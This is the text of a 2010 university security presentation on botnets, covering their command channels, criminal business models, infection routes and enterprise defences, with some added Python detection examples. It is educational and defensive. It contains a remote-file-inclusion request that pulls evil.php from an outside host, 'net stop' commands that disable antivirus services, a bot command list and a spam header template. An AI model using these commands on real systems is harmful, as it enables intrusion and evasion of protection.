
Botnets and the Army of Darkness

A Presentation for IDC 2010

Craig A Schiller, CISSP-ISSMP, ISSAP


Portland State University
CISO
craigs@pdx.edu

Copyright Craig Schiller, 2010. This work is the intellectual property of the author.
Permission is granted for this material to be shared for non-commercial, educational
purposes, provided that this copyright statement appears on the reproduced
materials and notice is given that the copying is by permission of the author. To
disseminate otherwise or to republish requires written permission from the author.

12/08/21 © 2009 Craig A Schiller AOD - 1


Presentation materials from

Handbook Against the AOD
Agenda

• Botnet Overview
• Botnet Schemes
• How Do They Get In?
• What Can We Do?
• Concluding Thoughts


Why are We Here?



Strategy Against Botnets
“Cut off the head of the snake and the body will follow”

Unless of course, your snake is a Hydra


How Do Botherders Protect the C&C

• Multi-homed DNS
  – FQDN maps to 3 or more IP addresses, e.g.
    botnet1.example.com pointing to 127.0.0.1
    botnet1.example.com pointing to 127.0.0.2
    botnet1.example.com pointing to 127.0.0.3
    botnet1.example.com pointing to 127.0.0.4
    botnet1.example.com pointing to 127.0.0.5
    botnet1.example.com pointing to 127.0.0.6
  – Dynamic DNS used through a commercial site
  – Change IP addresses quickly
• Short DNS TTLs for clients
  – Remap DNS often, check at boot
• Fast-flux DNS
  – Change IP addresses and/or DNS names quickly (for spam, < 5 minutes) and often
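A defender-side way to spot the multi-homed, short-TTL pattern just described, as an added example that is not from the presentation: it scores passive-DNS observations (constructed sample records in documentation address ranges, with assumed thresholds) and flags names that combine many addresses, several networks and short TTLs.

```python
# Added example (not from the presentation): score passive-DNS observations
# for the fast-flux / multi-homed behaviour described above. The record
# layout and the thresholds are assumptions; the sample records are constructed.
from collections import defaultdict
from ipaddress import ip_address

# Constructed passive-DNS observations: (queried name, answer IP, TTL seconds).
# Documentation address ranges are used so nothing here points at a real host.
SAMPLE_RECORDS = [
    ("botnet1.example.com", "192.0.2.10", 180),
    ("botnet1.example.com", "198.51.100.7", 120),
    ("botnet1.example.com", "203.0.113.55", 60),
    ("botnet1.example.com", "192.0.2.200", 180),
    ("botnet1.example.com", "203.0.113.9", 60),
    ("botnet1.example.com", "198.51.100.99", 120),
    ("www.example.org", "192.0.2.40", 86400),
    ("www.example.org", "192.0.2.41", 86400),
    ("cdn.example.net", "198.51.100.20", 300),
    ("cdn.example.net", "198.51.100.21", 300),
    ("cdn.example.net", "198.51.100.22", 300),
]

# Assumed thresholds: many addresses, spread over several /16 networks, with
# TTLs short enough that clients re-resolve within minutes.
MIN_ADDRESSES = 5
MIN_NETWORKS = 3
MAX_TTL = 300


def summarize(records):
    """Collapse observations into per-name statistics."""
    stats = defaultdict(lambda: {"ips": set(), "nets": set(), "min_ttl": None})
    for name, ip, ttl in records:
        s = stats[name]
        s["ips"].add(ip)
        # The /16 prefix (first two octets) is a cheap stand-in for
        # "a different network".
        octets = ip_address(ip).packed
        s["nets"].add((octets[0], octets[1]))
        s["min_ttl"] = ttl if s["min_ttl"] is None else min(s["min_ttl"], ttl)
    return stats


def fast_flux_candidates(records):
    """Return {name: reasons} for names matching the fast-flux profile."""
    flagged = {}
    for name, s in summarize(records).items():
        reasons = []
        if len(s["ips"]) >= MIN_ADDRESSES:
            reasons.append(f"{len(s['ips'])} distinct addresses")
        if len(s["nets"]) >= MIN_NETWORKS:
            reasons.append(f"{len(s['nets'])} distinct /16 networks")
        if s["min_ttl"] <= MAX_TTL:
            reasons.append(f"TTL as low as {s['min_ttl']}s")
        # All three are required: a CDN is multi-homed with low TTLs too,
        # but normally stays inside its own address blocks.
        if len(reasons) == 3:
            flagged[name] = reasons
    return flagged


if __name__ == "__main__":
    for name, why in fast_flux_candidates(SAMPLE_RECORDS).items():
        print(name, "->", "; ".join(why))
```

Real passive-DNS feeds carry far more records per name, so tune the thresholds against a week of your own resolver logs before acting on a hit.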
Hiding the C&C Server or Phishing Website

The animation on this slide demonstrates a persistent phishing cluster detected and analyzed by InternetPerils, using server addresses from 20 dumps of the APWG repository, the earliest shown 17 May and the latest 20 September. This phishing cluster continues to persist after the dates depicted, and InternetPerils continues to track it.


Why are We Here?

Microsoft Senior Security Manager says botnets are the biggest threat of 2007.

Vint Cerf, founder of the Internet, tells a global finance conference that 1/4th of all computers belong to botnets.

Norman Elton and Matt Keel from the College of William & Mary, in a 2005 presentation, called bot networks “the single greatest threat facing humanity.”

John Canavan, in “The Evolution of Malicious IRC Bots,” says that botnets are “the most dangerous and widespread Win32 viral threat.”

Microsoft reports that of the 5.7 million unique Windows systems from which the MSRT removed malware, 62% were found to have a Trojan or bot client.

Ryan Naraine, a writer for eWeek, said that botnets are “the key hub for well organized crime rings around the globe, using stolen bandwidth from drone zombies to make money from nefarious Internet activity.”


Viruses, Worms, Trojans, and Botnets

Virus – Autonomous, malicious code; infects the boot sector or files but cannot spread itself to another computer. Spreads manually via floppy disks, later by email or web download.
Worm – Autonomous, malicious code; spreads across the network via email or via network vulnerabilities.
Trojan – Malicious code that poses as legitimate code to get the user to execute it.
Remote Access Trojan – Malicious code which poses as legitimate code to gain access, then permits the operator to gain remote control of the victim’s computer.
Bot clients/Zombies – Malicious code which permits a victim’s computer to be controlled by an agent. The agent makes it easy for the operator (called a bot herder) to manage and operate tens and hundreds of thousands of clients.
Army of Darkness – Collectively, all of the zombies controlled by botherders.
What makes a Bot a Bot?

[Diagram: a traditional botnet, with a C&C server reaching 100 to 100,000 bot clients over the IRC protocol]

In the original use of the term “Bot”, the bot client contained malicious code that would retrieve and execute commands that were sent by the botherder.
What makes a Bot a Bot? - 2

[Diagram: alongside IRC-protocol bots, the C&C now also reaches remotely controlled clients through Terminal Services, VNC, RDP, Carbon Copy, BackOrifice and SubSeven]

Now, many include the systems that execute commands of the botherder even if the malicious code is not present. These systems are remotely controlled. They would be considered bot clients if they were part of a “net” of remotely controlled clients, even if the “bot” mechanism is somewhere else.
Command & Control Today

• Google cloud platform used for botnet control
• Twitter-based botnet command channel
• HTTP pull-based Command & Control
• P2P Command & Control
• Random-name fast-flux DNS


Botnet Commands

bot.command – Runs a command with system()
bot.flushdns – Flushes the bot’s DNS cache
bot.quit – Quits the bot
bot.longuptime – If uptime is more than 7 days, bot will respond
bot.sysinfo – Displays the system info
bot.status – Gives status
bot.rndnick – Generates a new random nick
bot.remove – Removes the bot
bot.open – Opens a file
bot.nick – Changes the bot’s nickname
bot.id – Displays the current code ID
shell.disable – Disables shell handler
shell.enable – Enables shell handler
shell.handler – Fallback handler for shell
commands.list – Lists all available commands
plugin.unload – Unloads a plug-in (not supported yet)
plugin.load – Loads a plug-in
inst.svcdel – Deletes a service
inst.svcadd – Adds a service
mac.login – Logs the user in
mac.logout – Logs the user out
ftp.update – FTPs and executes a file
ftp.execute – FTPs and updates the bot
ftp.download – Downloads a file from FTP
http.visit – Visits URL with specific referrer
http.update – Executes a file from HTTP URL
http.execute – Updates the bot from HTTP
http.download – Downloads a file from HTTP
rsl.logoff – Logs the user off
rsl.shutdown – Shuts the computer down
rsl.reboot – Reboots the computer
pctrl.kill – Kills a process
pctrl.list – Lists all processes
ddos.httpflood – Starts an HTTP flood
redirect.stop – Stops all redirects running
redirect.https – Starts an HTTP Secure proxy
redirect.http – Starts an HTTP proxy
harvest.aol – Makes the bot get AOL data
harvest.emailshttp – Gets a list of e-mails via HTTP
harvest.emails – Gets a list of e-mails

Source: Joe Stewart, SecureWorks
Evolution of Bot Technology

[Timeline figure: a timeline showing the introduction of bots and bot technology, 1988–2006, dated Saturday, March 03, 2007]

1988 – Invention of IRC
1989 – Greg Lindahl invents GM, the first bot. GM plays “Hunt the Wumpus” with IRC users.
1999 – Pretty Park discovered: the first worm to use an IRC server as a means of remote control.
1999 – SubSeven trojan/bot: a remote control trojan; added control via IRC.
2000 – GT Bot, mIRC based: runs scripts in response to IRC server events; supports raw TCP and UDP socket connections.
2002 – SDBot, written in C++: source code available to the hacker community; small, single binary.
2002 – AgoBot, Gaobot: introduces modular design. The 1st module breaks in and downloads the 2nd module; the 2nd module turns off anti-virus, hides from detection and downloads the 3rd module; module 3 has the attack engines/payload.
2003 – SpyBot: spyware capabilities (keylogging, data mining for email addresses, lists of URLs, etc.).
2003 – RBot: the most prevalent bot today. Spreads through weak passwords, is easily modifiable, and uses packaging software.
2004 – PolyBot: a derivative of AgoBot with polymorphic ability; changes the look of its code on every infection.
2005 – MYTOB: the MyDoom mass-emailing worm with bot IRC C&C.


Why Do They Do It?

"Why should I take a regular job after graduating and exert myself to earn just $2,000 a month, rather than grab this chance to make money? It makes sense to get as much as you can, as quickly as possible, rather than wasting time working for someone else."

Russian hacker on a cyber-crime credit card fraud forum


RBN Operations

Services: Some external services are used by RBN and affiliates. Those services can be MX relay or NS hosting.
RBN: This is the core business of RBN. It is used to offer hosting for cybercrime. Inside this part, we can identify the direct subsidiaries of RBN: Nevacon and Akimon.
Hosting: This is the part used to host most of RBN public websites, to register RBN domain names… Hosting and registration is a really strong partner for RBN. Incidentally, it could be possible that those two blocks are under the same company.
Telecom: This is the entity which aims at providing the Internet access. It seems that SBTel has obtained access from Silvernet to the Saint Petersburg Internet Exchange Point (SPBIX).

11/21/07 Ref: Bizeul.org


RBN Operations

[Diagram of the RBN network of companies: SILVERNET, CREDOLINK, RBN, OINVEST, SPB IX, DELTASYS, INFOBOX, DATAPOINT]

11/21/07 Ref: Bizeul.org
RBN USA Dead?

It is pleasing to report the last remaining peer routing Atrivo (AS 27595 Atrivo/Intercage), ‘Pacific Internet Exchange’ (PIE), see Spamhaus ref below, was withdrawn at 2:35am EST Sunday Sept 21st 2008.


McColo



Effect of De-peering
50% Drop in Spam



The Challenge

"If we do not, on a national scale, attack organized criminals with weapons and techniques as effective as their own, they will destroy us."

Robert F. Kennedy, 1960


Botnet animation



Botnet Life Cycle

1. Computer is exploited and becomes a bot
2. New bot rallies to let the botherder know it’s joined the team
3. Retrieve the anti-A/V module
4. Secure the new bot client
5. Retrieve the payload module
6. Listen to the C&C server/peer for commands
7. Execute the commands
8. Report the result to the C&C channel
9. On command, erase all evidence and abandon the client

Characteristics called out on the slide: Modular, Adaptive, Targetable.
Botnet Client communication



Top Ten Most Dangerous Bots
July 2009

No. 1: Zeus aka Z-bot – Financial Trojan, keystroke logger, MITB – 3.6M
No. 2: Koobface – Social engineering, trojaned codec, bot client – 2.9M
No. 3: TidServ – Trojaned spam attachment, rootkit, see #4 – 1.5M
No. 4: Trojan.Fakeavalert – Social engineering delivery vehicle – 1.4M
No. 5: TR/Dldr.Agent.JKH – Remote control Trojan, sends encrypted data to C&C, clickbot – 1.2M
No. 6: Monkif – Middleware, attempts to download adware BHO – .5M
No. 7: Hamweq aka IRC Brute – an autorun worm, downloader – .48M
No. 8: Swizzor – Trojan dropper, installs adware – .37M
No. 9: Gammima aka Gamania, Frethog, Vaklik and Krap – steals online game account info, rootkit, spreads on USB – .23M
No. 10: Conficker aka Downadup – propagates 4 ways – .21M
2009 Top 10 Malware Families

Koobface
Zeus
Tidserv
Monkif
Conficker
Vundo
Swizzor
Hamweq
Sinowal
Matcash



Additions

Torpig/Mebroot – Financial bot, boot sector virus; re-imaged machines still infected
Bredolab – A downloader now connected with Zeus and FakeAV
Mariposa – Harvests financial information, sells parts of the botnet, installs pay-per-install toolbars, sells stolen credentials for online services, and uses the stolen banking credentials and credit cards to make transactions to overseas mules; possible hijacking of Google AdSense advertisement revenue. 3 arrested; 12.7M


Man in the Browser Attack - torpig



Spam

As of 3/9/2010 Barracuda reports that 88.74% of all email processed by their spam appliances worldwide was spam:
1,497,376,877 spam emails out of 1,687,380,806 total emails
(http://www.barracudacentral.org/index.cgi?p=spam)


Botnets and Spam



Spam Template
Received: from 192.168.0.%RND_DIGIT
(203-219-%DIGSTAT2-%STATDIG.%RND_FROM_DOMAIN [203.219.%DIGSTAT2.%STATDIG])
by mail%SINGSTAT.%RND_FROM_DOMAIN (envelope-from %FROM_EMAIL)
(8.13.6/8.13.6) with SMTP id %STATWORD for <%TO_EMAIL>; %CURRENT_DATE_TIME
Message-Id: <%RND_DIGIT[10].%STATWORD@mail%SINGSTAT.%RND_FROM_DOMAIN>
From: "%FROM_NAME" <@%FROM_EMAIL>
X-Spam-Flag: YES
X-Scanned-By: milter-spamc/0.25.321 (localhost [0.0.0.0]); Thu, 01 Mar 2007
09:14:01 -0600
X-Scanned-By: milter-spamc/0.25.321 (miconsulting.com [66.34.157.130]);
Thu, 01 Mar 2007 09:14:01 -0600
X-Spam-Status: YES, hits=8.60 required=5.00
X-Spam-Level: xxxxxxxx
Subject: [SPAM]
Status: RO

%TO_CC_DEFAULT_HANDLER
Subject: %SUBJECT
Sender: "%FROM_NAME" <%FROM_EMAIL>
Mime-Version: 1.0
Content-Type: text/html
Date: %CURRENT_DATE_TIME

%MESSAGE_BODY
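As an added example (not part of the presentation), a mail-side check for the marks this template leaves behind: macros the bot failed to expand (%NAME or %NAME[n], the syntax used above) and a forged first Received hop from a private address. The message, host names and field names below are constructed.

```python
# Added example (not from the presentation): detect residue of a bot spam
# template in a received message. The sample message is constructed.
import re
from email import message_from_string
from ipaddress import ip_address

# Unexpanded template macros, %NAME or %NAME[n] as in the template above.
# When a bot mis-fires they reach the recipient verbatim.
MACRO = re.compile(r"%[A-Z][A-Z0-9_]*(?:\[\d+\])?")
# The "from <host>" part that opens a Received header.
RECEIVED_FROM = re.compile(r"\s*from\s+(\S+)", re.I)

# Constructed message (not a real capture): the template filled in, except a
# Message-Id macro the bot failed to expand, plus the forged private-address
# first hop with a public-looking reverse name that the template fabricates.
SAMPLE_MESSAGE = """\
Received: from 192.168.0.47 (203-219-8-19.isp.example [203.219.8.19])
\tby mail3.isp.example (envelope-from a@isp.example)
\t(8.13.6/8.13.6) with SMTP id tQfa for <victim@example.org>; Thu, 01 Mar 2007 09:14:01 -0600
Message-Id: <%RND_DIGIT[10].tQfa@mail3.isp.example>
From: "Alex" <a@isp.example>
Subject: Making Dollars and Sense Now is The Time!
Content-Type: text/html

<html><body>SymboL: PSCP Current Price: $0.35</body></html>
"""


def unexpanded_macros(raw):
    """Template macros left in any header, as 'Header: %MACRO' strings."""
    msg = message_from_string(raw)
    found = []
    for name, value in msg.items():
        found.extend(f"{name}: {m}" for m in MACRO.findall(value))
    return found


def forged_first_hops(raw):
    """Received headers whose 'from' host is an RFC 1918 address.

    For mail that arrived from the Internet, a hop claiming a LAN origin
    was written by the sender, which is exactly what the template does.
    """
    msg = message_from_string(raw)
    hits = []
    for received in msg.get_all("Received", []):
        m = RECEIVED_FROM.match(received)
        if not m:
            continue
        try:
            if ip_address(m.group(1)).is_private:
                hits.append(m.group(1))
        except ValueError:
            # Not an IP literal: a hostname, or an unexpanded macro such as
            # 192.168.0.%RND_DIGIT, which the macro check reports instead.
            pass
    return hits


def template_score(raw):
    """One point per indicator; a caller would add this to its spam score."""
    return len(unexpanded_macros(raw)) + len(forged_first_hops(raw))
```

Mail submitted from inside your own network legitimately shows a private first hop, so apply the Received check only to messages accepted from the Internet.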
Pump & Dump Stocks

Making Dollars and Sense Now is The Time!

SymboL: PSCP
Current Price: $0.35
5 Day Target price: 1.75
Action: Aggresive Buy

Underbanked consumers are an opportunity investors can't afford to miss, especially as new research reveals a closer look at the breadth and potential of the market. According to a new study by BearingPoint and Visa, approximately 84 million people are un- and underbanked, representing $1.1 trillion in income. Assuming these consumers spend 1% of their income to pay for financial services, that amounts to $11 billion. And that is at 1%! Not bad work if you can get it.

http://www.crummy.com/features/StockSpam/
How Much Do They Make?
• Blue Security, a security company that took on spammers aggressively, underwent a Distributed Denial of Service (DDoS) attack from zombie computers under the control of a Russian-speaking spammer.
• This spammer (or spam gang), which we called PharmaMaster, claimed to make $3M a month off of spam.
• Unwilling to give up that income, he paid a hacker $2,000 an hour to perform the DDoS against Blue Security.
• It cost him over $1M by the time all was said and done.
• It exhausted the funding of Blue Security and they were forced to close shop.


Botnets and Movie Theft

Release group hires/uses a botnet for storage and distribution.

15% of losses attributed to college students.


Botnets and Clicks-4-Hire



Botnets and Clicks-4-Hire

Bot-driven fraud has become such a big business that Google was recently sued by class-action plaintiffs who claimed that bots, not people, had clicked on their ads. The ads were priced based on how many clicks they received; apparently competitors had hired bots to jack up the rate with an avalanche of extra clicks.

Charged with negligence for failing to guard against such abuses, Google settled for $90 million.

“Attack of the Bots”, by Scott Berinato, Wired 14.11, Nov 2006
Extortion
• We’ve encrypted your files.
  • Pay me for the key to decrypt them.
• We’re DDoSing your website.
  • Pay me to stop.
  • Pay me not to start.

In 2004, botnets attacked dozens of online gambling sites. The bookmakers were told to pay between $10,000 and $50,000 to get their sites back online. (Wired, Nov 2006)

But, of course, “Once you have paid him the Dane-geld, you never get rid of the Dane.”
“Dane-geld (A.D. 980-1016)”, by Rudyard Kipling


Theft – Identity and other

• Keystroke logging attacks
• Harvesting credit cards, SSAN, keys, passwords

[11:23] *** :newyork.ny.us.somewhere.org 322 Justlooking #cards 73 : Welcome. WGeTz sell fulls, msg HIM. NEW -> www.kentmintek.com/coolindex.html . WGeTz needs ITALY WU DROP.


Theft – Identity and other

• Phishing attacks
• Pharming attacks



Phishing Overview

[Diagram: one botnet client hosts the phishing website while another botnet client sends the spam]
How do they get in?

1. Guessing weak passwords/phishing attacks
2. Exploiting network vulnerabilities
3. Using social engineering
4. Using web-based Trojans
  • Trojan websites – game cheats
  • Trojan websites – pornography
5. Using email-based Trojans
  • Phishing & pharming
  • Trojan downloads
6. Using IM-based Trojans (social engineering)
7. Rogue DHCP server serving a malicious DNS server
Money Mule
1. Fraudsters contact prospective victims:
“I am Mr. Richard H. Mason President/CEO MM Group Handling.

We are a trading company that is into the hire, sales and service of Electrical Trucks, Fork Trucks and associated materials handling equipments and diverse range of battery for electric vehicles which can be readily adapted for customers specific requirements to the America and selected locations in Europe.

We are searching for individuals or a company who can act as our representative/payment agent in your country and earn 10% of every payment made through you to us.”
2. The crime rings persuade the victim to come and work for their fake company.
3. Money mules receive funds into their accounts. These funds are stolen from other accounts that have been compromised.
4. Mules are then asked to take these funds out of their accounts and forward them overseas (minus a commission payment), typically using a wire transfer service.
Source: Bank Safe Online
Botnets for Sale

Botnet ad on an IRC channel:

[11:07] *** :newyork.ny.us.someplace.org 322 Justlooking #Bot-Services 6 :(Lew|s-) Welcome. My BotNet is ready to be used. You would like to profit from it? Leave a msg on the channel, one @ will respond to you soon. Thank you!

“There may be millions of such PCs around the world doing the bidding of crime gangs, experts say, and they can be rented for as little as $100-per-hour.”
Home PCs rented out in sabotage-for-hire racket, by Bernhard Warner, Reuters

“Fluid third-party exchange market (millions)
• Going rate for spam proxying 3-10 cents/host/week
• Seems small, but a 25k botnet gets you $40k-130k/yr
• Raw bots, $.01+/host; special orders ($50+)”
Geoffrey M Voelker, UC San Diego
How do they get into webservers?

Vulnerable code on Target.com:
<?php include($vuln); ?>

1. Attacker sends GET /a.php?vuln=http://webhost.com/evil.php to Target.com
2. Target makes a request to webhost.com/evil.php
3. Malware PHP file ‘evil.php’ is sent to Target.com and is executed by the include() function
4. The output from evil.php is sent to the Attacker


Top 5 Reasons Why I think I’m Safe

1. There’s nothing important on my computer
2. My A/V program said I didn’t have a virus
3. I checked and I didn’t see anything
4. My corporate firewall will protect me
5. I have a Mac/Unix computer. They don’t get viruses


I have a Mac/Unix computer.

#1 platform for Command & Control servers – Unix

Mac Trojan aimed at taking money from Mac users:
The Trojan comes disguised as a video-decoding plug-in that users are told they must install to watch free porn clips. Instead, the software burrows into the operating system and diverts some of the victim's future web surfing to sites under the attacker's control. It's the professional attack on Macs that the security community has long predicted, according to Dave Marcus, security research manager at McAfee's Avert Lab, who said it was "written by people who know how to write malware."

http://www.wired.com/politics/security/news/2007/11/mac_trojan


Firewall will protect me

Firewalls are designed to let traffic in


I checked and I didn’t see anything

Hidden32.exe permits applications to run without using their GUI
HideUserv2.exe adds an invisible user to the administrator group
User mode rootkits
Kernel mode rootkits


A/V Program Said No Virus

net start >>starts
net stop "Symantec antivirus client"
net stop "Symantec AntiVirus"
net stop "Trend NT Realtime Service"
net stop "Symantec AntiVirus"
net stop "Norton antivirus client"
net stop "Norton antivirus"
net stop "etrust antivirus"

Best bot left the A/V tray icon and a fake GUI




Nothing Important

Your space, network, & processing power
• Child pornography
• Bestiality
• Stolen movies, games, & software
Your access
• Student records
• SSAN
• University resources
• Your email
Your money
Your identity




Protect Your Enterprise
1. Ensure that all enterprise and local accounts have strong passwords. Configure domain security policy to enforce this and auto-lockout.
2. Eliminate all generic accounts. Where possible make all non-user accounts services.
3. Eliminate or encapsulate all unencrypted authentication.
4. Establish a perimeter and segregate valuable or dangerous network segments. Make FW rules accountable and require change control.
5. Establish standards for web app and other development to eliminate avoidable coding vulnerabilities (e.g. use of mod_security for Apache websites).
6. Staff your anti-spam, anti-virus, abuse, proxy cache, and web filter processing efforts.
7. Install and operate IDS/IPS systems (like ourmon, snort, etc.).
8. Google your own site - site:mysite.com viagra
9. Actively scan your site for vulnerabilities.
10. Centralize and process logs, including workstation security and firewall logs.
11. Mine your anti-virus quarantines, abuse notifications, and infected systems for intelligence about botnet infections.
12. Participate in or join quasi-intelligence organizations and use their data in your detection tools. Report new info: phishing attacks to www.castlecops.com/PIRT, botnet clients/C&C to isotf.org.
How Do We Detect Them?

Bot detection is mostly behavioral.

Host based: A/V, Anti-Spam, Anti-Spyware, Security logs, RUBotted – Trend Micro
Enterprise Reporting: User Help Desk Tickets, Abuse notifications, Quasi-Intelligence Organizations
Monitoring & Analysis: Ourmon, Firewall & Router logs, IDS/IPS – Host and Network, Darknets, Honeypots, DNS, Server & Workstation Log analysis, Malware analysis (Sandbox), Forensics
Responding to Detection

[Flow diagram] Detection inputs: botnet sensors watching the Internet edge, a security researcher, the Wormwatch mailing list, and the McAfee server. They produce tags on campus hosts such as:
131.252.x.x NERO says bad
131.252.x.x Acting Bad
131.252.x.x talking to bad
38.100.x.x McAfee says bad

The tags, together with user reports, are handed to the teams:
Network Team: Create tracking ticket; Block network access; Identify location; Identify computer or user
User Support: Identify computer or user; Retrieve computer; Backup all files; Perform quick forensics; Re-image computer
Server Support: Identify server or webpage owner; Identify compromised account; Locate infected system; Identify system owner; Locate malware; Determine attack vector; Re-image computer
Security Team: Identify computer or user; Review quick forensics; Perform deep forensics; Ensure appropriate resources are working the incident; Identify useful intelligence markers
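The behavioral tagging described under “How Do We Detect Them?” and fed into the response flow above, as an added example that is not from the presentation: constructed flow records are checked against an assumed indicator list and thresholds, and hosts are labelled with the tag names the diagram uses.

```python
# Added example (not from the presentation): behavioural host tagging over
# flow summaries. Record layout, indicator list and thresholds are
# assumptions; the flows and addresses are constructed (documentation ranges).
from collections import defaultdict

# Constructed flow summaries: (source IP, destination IP, destination port).
SAMPLE_FLOWS = [
    # host .10: repeated connections to a listed C&C address on an IRC port
    ("192.0.2.10", "203.0.113.66", 6667),
    ("192.0.2.10", "203.0.113.66", 6667),
    ("192.0.2.10", "203.0.113.66", 6667),
    # host .11: direct-to-MX spam fan-out (many distinct hosts on port 25)
    *[("192.0.2.11", f"198.51.100.{n}", 25) for n in range(1, 31)],
    # host .12: ordinary mail use, always through the campus relay
    *[("192.0.2.12", "192.0.2.25", 25) for _ in range(40)],
    # host .13: ordinary web browsing
    ("192.0.2.13", "198.51.100.200", 443),
    ("192.0.2.13", "198.51.100.201", 80),
]

# Indicators a quasi-intelligence feed (a malware domain list, an abuse
# report) would supply; constructed here.
KNOWN_BAD = {"203.0.113.66"}
IRC_PORTS = {6666, 6667, 6668, 6669, 7000}   # traditional C&C channel ports
SPAM_FANOUT = 20   # distinct SMTP peers before a host is "acting bad"


def tag_hosts(flows, known_bad=KNOWN_BAD):
    """Return {source IP: sorted tags} for every host that earned a tag."""
    smtp_peers = defaultdict(set)
    irc_peers = defaultdict(set)
    tags = defaultdict(set)
    for src, dst, dport in flows:
        if dst in known_bad:
            tags[src].add("talking to bad")
        if dport in IRC_PORTS:
            irc_peers[src].add(dst)
        if dport == 25:
            smtp_peers[src].add(dst)
    for src, peers in smtp_peers.items():
        # A workstation that talks SMTP to dozens of distinct hosts is
        # delivering mail itself, the spam-bot pattern from the slides.
        if len(peers) >= SPAM_FANOUT:
            tags[src].add("acting bad: smtp fan-out to %d hosts" % len(peers))
    for src, peers in irc_peers.items():
        # Not proof by itself, but worth a look: IRC is the classic C&C.
        tags[src].add("irc client: %d server(s)" % len(peers))
    return {src: sorted(t) for src, t in tags.items()}


if __name__ == "__main__":
    for host, host_tags in tag_hosts(SAMPLE_FLOWS).items():
        print(host, host_tags)
```

Each tagged host becomes the tracking ticket the Network Team opens in the flow above; the "talking to bad" tag is the one that justifies an immediate network block.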
Quasi-Intelligence Organizations

Organizations: REN-ISAC, Shadowserver, Nanog, Castlecops.com (MIRT, PIRT), ISC Storm Center, APWG

Mailing lists
• Botnet: http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
• Phishing: http://www.whitestar.linuxbox.org/mailman/listinfo/phishing
• Vendor

http://www.bleedingthreats.net/fwrules/


Malware Domain List



Hosts-file.net



Educause Recommendations
1. Make certain that systems used in performing financial transactions
are protected by strict technical controls and receive periodic validation.
2. Make certain that personnel involved in performing online financial
transactions have the necessary security awareness and training. Those
persons should receive targeted training on phishing and this threat.
3. Have written policies defining the controlled environment in which
online banking transactions can be conducted, e.g. what systems can be
used, how they must be maintained, required personnel training, etc.
4. Routinely audit compliance with established technical controls and
policies.
5. WE STRONGLY RECOMMEND THAT all online banking operations
should be conducted on special-use computers that are used SOLELY
for banking transactions. No other use of the machine should be
permitted - no e-mail, no web browsing, no general-purpose business
use - nothing but institutional online banking transactions.



More technical recommendations

-- Application white-listing, e.g. on Windows, AppLocker[1][2], can offer significant protection.
-- Systems used for online banking:
   + Should have the least amount of software installed as necessary to facilitate their business functions.
   + Should have Javascript and ActiveX disabled or specifically limited to trusted sites.
   + Should be subject to a change management process for any work that's to be done on the machine. Multiple-party approvals should be required.
   + Should be examined monthly and routinely patched by professional institutional IT security staff. If the system is not examined or patched by a specific date of a month, business office folks should not use it until the IT security staff bring it up to date.
-- Two-factor authentication should be used for banking access where available. While two-factor authentication will not protect against all attacks it does provide protection against many. Sites should press their banks to offer two-factor if they don't already.


More technical recommendations

Separate machine(s) used SOLELY for institutional online banking operations (and used for all such operations) is STRONGLY RECOMMENDED. Useful technical and policy controls include (referencing The Irretrievable Losses of Malware-Enabled ACH and Wire Fraud):
   + Don't make the machine part of a Windows domain. Administer the machine using a local administrator account.
   + Shut the machine down when not in use.
   + Implement very aggressive firewall and possibly proxy protections for the system. All non-banking traffic should be denied.
   + Aggressively monitor traffic to and from the system.
   + Place the machine on a separate VLAN, on a secure dedicated hard-wired network connection.


More technical recommendations

   + No other use of the machine should be permitted - no e-mail, no web browsing, no general-purpose business use - nothing but institutional online banking transactions.
   + Physical access to the machine should be tightly controlled.
   + The system should have a permanent and obvious distinguishing mark, e.g. spray paint it orange, to ensure there can be no mistaking that this is a special purpose machine.
   + Any other intentional use of the machine should be a cause for disciplinary action.
-- While virtual machine solutions are technically an option to dedicated machines, in the interest of keeping the solution simple, clean, usable, and understandable by non-technical business office staff, we do not recommend virtual solutions.
-- And as always, "user privilege reduction" - the user should never conduct normal use of the system under an admin-privileged account.
-- Other standard desktop hardening recommendations and practices apply, e.g. .


Closing Thoughts

Botherders are human adversaries, and can respond to detection strategies.

David Dagon, 2007




Source of all evil



Q&A

Questions?

Craig A Schiller, CISSP-ISSMP, ISSAP
craigs@pdx.edu
Portland State University
CISO